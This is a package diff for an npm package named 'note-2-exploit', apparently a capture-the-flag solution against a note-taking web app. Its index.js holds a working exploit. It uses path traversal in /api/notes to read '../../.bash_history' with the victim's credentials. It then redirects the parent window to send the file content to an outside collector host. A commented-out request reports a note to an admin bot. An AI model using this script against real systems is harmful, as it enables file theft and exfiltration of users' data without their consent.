note-2-exploit 1.0.0

package/index.js

@@ -0,0 +1,32 @@
+async function exploit() {
+    let file_content = await fetch("/api/notes?id=" + "../../.bash_history", {
+        "headers": {
+            "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
+            "accept-language": "zh-TW,zh;q=0.9",
+            "sec-gpc": "1",
+            "upgrade-insecure-requests": "1"
+        },
+        "body": null,
+        "method": "GET",
+        "mode": "cors",
+        "credentials": "include"
+    }).then(res => res.json())
+        .then(res => res.content);
+    window.parent.location.replace("https://omniman.free.beeceptor.com?q=" + file_content);
+    // fetch("http://10.113.184.121:10082/report", {
+    //     "headers": {
+    //         "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
+    //         "accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
+    //         "cache-control": "max-age=0",
+    //         "content-type": "application/x-www-form-urlencoded",
+    //         "sec-gpc": "1",
+    //         "upgrade-insecure-requests": "1"
+    //     },
+    //     "referrer": "http://10.113.184.121:10082/note?id=d2fb5034-dfa3-4fbe-be8e-7f75ff8d53a7",
+    //     "referrerPolicy": "strict-origin-when-cross-origin",
+    //     "body": "note_id=d2fb5034-dfa3-4fbe-be8e-7f75ff8d53a7&author=nnnddd",
+    //     "method": "POST",
+    //     "mode": "cors",
+    //     "credentials": "include"
+    // });
+};

package/package.json

@@ -0,0 +1,11 @@
+{
+  "name": "note-2-exploit",
+  "version": "1.0.0",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "",
+  "license": "ISC"
+}